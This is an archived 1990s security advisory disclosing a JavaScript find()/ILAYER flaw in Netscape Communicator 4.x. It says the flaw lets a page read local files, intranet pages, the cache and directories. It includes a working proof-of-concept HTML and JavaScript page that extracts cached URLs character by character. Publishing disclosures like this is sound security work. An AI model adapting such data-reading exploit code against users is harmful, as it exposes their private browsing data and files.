There is a design flaw in Netscape Communicator 4.5 Win95, 4.08 WinNT (I guess all 4.x version are vulnerable) which allows the following security exploits: *)Reading the parsed content of local HTML files (by 'parsed' I mean the text the user sees, not the actual HTML source) *)Reading the parsed content of HTML files on a web server blocked by a firewall (the browser and the web server must be on the same side of the firewall) *)Reading user's cache *)Browsing directories *)Probably others The exploits use the JavaScript find() function and the ILAYER tag. This may be exploited using HTML message. Workaround: Disable JavaScript Demonstration is available at: http://www.nat.bg/~joro/nsfind.html -----------HTML code------------- MBEGIN <ILAYER SRC="wysiwyg://1/about:cache"> </ILAYER> <SCRIPT> //mag='MBEGIN'; mag='Average cache'; mend='MEND'; res=mag; charstoread=100; function readit() { for(i=0;i<charstoread;i++) { t=res; find(mend); for(c=1;c<256;c++) { t=res + String.fromCharCode(c); if (find(t,true,true)) { // alert(c); res=t; } } } res=res.substring(mag.length); alert("The first URL in your cache is: \n" + res); } setTimeout('readit();',3000); </SCRIPT> MEND --------------------------------- Regards, Georgi Guninski http://www.nat.bg/~joro
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:38:15 PDT